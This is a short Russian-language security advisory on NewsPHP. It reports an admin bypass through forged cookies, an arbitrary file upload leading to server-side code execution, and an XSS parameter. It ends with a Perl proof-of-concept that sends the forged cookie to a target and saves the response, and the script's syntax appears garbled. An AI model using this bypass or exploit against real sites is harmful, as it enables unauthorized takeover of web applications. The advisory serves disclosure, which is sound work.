Программа: NewsPHP 

Несколько уязвимостей обнаружено в NewsPHP. Удаленный пользователь может получить полный административный доступ к приложению.
Удаленный пользователь может представить следующие куки, чтобы получить административный доступ к приложению: 

autorized=admin; root=admin

Также удаленный авторизованный администратор (или пользователь, эксплуатирующий уязвимость выше) может использовать File Upload, чтобы загрузить произвольные файлы на сервер, вместо видео файлов и затем выполнить их с привилегиями Web сервера. 

Также обнаружена XSS уязвимость: 

/index.php?cat_id=[XSS]

Эксплоит для первой уязвимости: 

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)

print «\n\n»;
print «PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n»;
print «Usage: POCnws.pl [host] [directory] [file.htm]\n\n»;
print «By: Manuel Lopez mantra at gulo.org\n»;
print «\n\n»;
exit(1);

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print «\n»;
print «—— Conecting .. <====\n\n»;
$socket = IO::Socket::INET->new(Proto => «tcp»,
PeerAddr => «$host»,PeerPort => «80») || die «$socket error $!»;
print «====> Conected\n»;
print «====> Sending Data .. \n»;
$socket->print(<<fin) or die «write: $!»;
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print «====> OK\n»;
print «====> Generating $fichero …\n»;
open( Result, «>$fichero»);
print Result while <$socket>;
close Result;



Оставить мнение